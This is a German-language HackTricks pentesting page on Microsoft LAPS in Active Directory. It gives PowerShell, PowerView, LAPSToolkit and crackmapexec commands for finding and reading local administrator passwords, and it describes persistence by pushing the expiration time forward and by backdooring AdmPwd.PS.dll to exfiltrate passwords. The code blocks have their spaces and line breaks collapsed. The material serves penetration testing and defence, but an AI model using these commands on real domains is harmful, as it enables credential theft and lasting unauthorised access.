Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks beworben sehen? Oder möchten Sie Zugriff auf die neueste Version des PEASS oder HackTricks als PDF herunterladen? Überprüfen Sie die ABONNEMENTPLÄNE!
Local Administrator Password Solution (LAPS) ist ein Tool zur Verwaltung eines Systems, bei dem Administratorpasswörter, die eindeutig, zufällig und häufig geändert sind, auf domänenbeigetretenen Computern angewendet werden. Diese Passwörter werden sicher in Active Directory gespeichert und sind nur für Benutzer zugänglich, denen über Zugriffssteuerungslisten (ACLs) Berechtigungen erteilt wurden. Die Sicherheit der Passwortübertragungen vom Client zum Server wird durch die Verwendung von Kerberos Version 5 und Advanced Encryption Standard (AES) sichergestellt.
Bei der Implementierung von LAPS in den Computerobjekten der Domäne werden zwei neue Attribute hinzugefügt: ms-mcs-AdmPwd und ms-mcs-AdmPwdExpirationTime. Diese Attribute speichern das Klartext-Administratorpasswort und dessen Ablaufzeit.
Überprüfen Sie, ob aktiviert
regquery"HKLM\Software\Policies\Microsoft Services\AdmPwd"/vAdmPwdEnableddir"C:\Program Files\LAPS\CSE"# Check if that folder exists and contains AdmPwd.dll# Find GPOs that have "LAPS" or some other descriptive term in the nameGet-DomainGPO|?{ $_.DisplayName-like"*laps*"}|select DisplayName, Name, GPCFileSysPath |fl# Search computer objects where the ms-Mcs-AdmPwdExpirationTime property is not null (any Domain User can read this property)
Get-DomainObject -SearchBase "LDAP://DC=sub,DC=domain,DC=local" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname
LAPS Passwortzugriff
Sie könnten die rohe LAPS-Richtlinie von \\dc\SysVol\domain\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol herunterladen und dann Parse-PolFile aus dem GPRegistryPolicyParser Paket verwenden, um diese Datei in ein menschenlesbares Format zu konvertieren.
Darüber hinaus können die nativen LAPS PowerShell-Cmdlets verwendet werden, wenn sie auf einer Maschine installiert sind, auf die wir Zugriff haben:
Get-Command*AdmPwd*CommandType Name Version Source----------------------------Cmdlet Find-AdmPwdExtendedRights5.0.0.0 AdmPwd.PSCmdlet Get-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Reset-AdmPwdPassword5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdAuditing5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdComputerSelfPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdReadPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Set-AdmPwdResetPasswordPermission5.0.0.0 AdmPwd.PSCmdlet Update-AdmPwdADSchema5.0.0.0 AdmPwd.PS# List who can read LAPS password of the given OUFind-AdmPwdExtendedRights-Identity Workstations | fl# Read the passwordGet-AdmPwdPassword-ComputerName wkstn-2| fl
PowerView kann auch verwendet werden, um herauszufinden, wer das Passwort lesen kann und es liest:
# Find the principals that have ReadPropery on ms-Mcs-AdmPwdGet-AdmPwdPassword-ComputerName wkstn-2| fl# Read the passwordGet-DomainObject-Identity wkstn-2-Properties ms-Mcs-AdmPwd
LAPSToolkit
Das LAPSToolkit erleichtert die Auflistung von LAPS mit mehreren Funktionen. Eine davon ist das Parsen von ExtendedRights für alle Computer mit aktiviertem LAPS. Dies zeigt Gruppen, die speziell dazu berechtigt sind, LAPS-Passwörter zu lesen, die oft Benutzer in geschützten Gruppen sind. Ein Konto, das einen Computer in eine Domäne aufgenommen hat, erhält Alle erweiterten Rechte über diesen Host, und dieses Recht gibt dem Konto die Möglichkeit, Passwörter zu lesen. Die Auflistung kann ein Benutzerkonto zeigen, das das LAPS-Passwort auf einem Host lesen kann. Dies kann uns helfen, spezifische AD-Benutzer zu identifizieren, die LAPS-Passwörter lesen können.
# Get groups that can read passwordsFind-LAPSDelegatedGroupsOrgUnit Delegated Groups-----------------------OU=Servers,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\Domain AdminsOU=Workstations,DC=DOMAIN_NAME,DC=LOCAL DOMAIN_NAME\LAPS Admin# Checks the rights on each computer with LAPS enabled for any groups# with read access and users with "All Extended Rights"Find-AdmPwdExtendedRightsComputerName Identity Reason--------------------------MSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\Domain Admins DelegatedMSQL01.DOMAIN_NAME.LOCAL DOMAIN_NAME\LAPS Admins Delegated# Get computers with LAPS enabled, expirations time and the password (if you have access)Get-LAPSComputersComputerName Password Expiration------------------------------DC01.DOMAIN_NAME.LOCAL j&gR+A(s976Rf%12/10/202213:24:41
Dumping LAPS-Passwörter mit Crackmapexec
Wenn kein Zugriff auf ein Powershell besteht, können Sie dieses Privileg remote über LDAP missbrauchen, indem Sie
crackmapexec ldap 10.10.10.10 -u user -p password --kdcHost 10.10.10.10 -M laps
LAPS Persistenz
Ablaufdatum
Sobald Administrator, ist es möglich, die Passwörter zu erhalten und zu verhindern, dass eine Maschine ihr Passwort aktualisiert, indem man das Ablaufdatum in die Zukunft setzt.
# Get expiration timeGet-DomainObject-Identity computer-21-Properties ms-mcs-admpwdexpirationtime# Change expiration time## It's needed SYSTEM on the computerSet-DomainObject-Identity wkstn-2-Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}
Das Passwort wird trotzdem zurückgesetzt, wenn ein Admin das Reset-AdmPwdPassword-Cmdlet verwendet; oder wenn Das Zulassen einer Passwortablaufzeit, die länger als vom Richtlinie erforderlich, nicht zulässt im LAPS-GPO aktiviert ist.
Hintertür
Der originale Quellcode für LAPS kann hier gefunden werden, daher ist es möglich, eine Hintertür im Code zu platzieren (innerhalb der Get-AdmPwdPassword-Methode in Main/AdmPwd.PS/Main.cs zum Beispiel), die irgendwie neue Passwörter exfiltriert oder irgendwo speichert.
Dann einfach die neue AdmPwd.PS.dll kompilieren und auf die Maschine unter C:\Tools\admpwd\Main\AdmPwd.PS\bin\Debug\AdmPwd.PS.dll hochladen (und das Änderungsdatum ändern).
Arbeiten Sie in einem Cybersicherheitsunternehmen? Möchten Sie Ihr Unternehmen in HackTricks beworben sehen? oder möchten Sie Zugriff auf die neueste Version des PEASS erhalten oder HackTricks im PDF-Format herunterladen? Überprüfen Sie die ABONNEMENTPLÄNE!
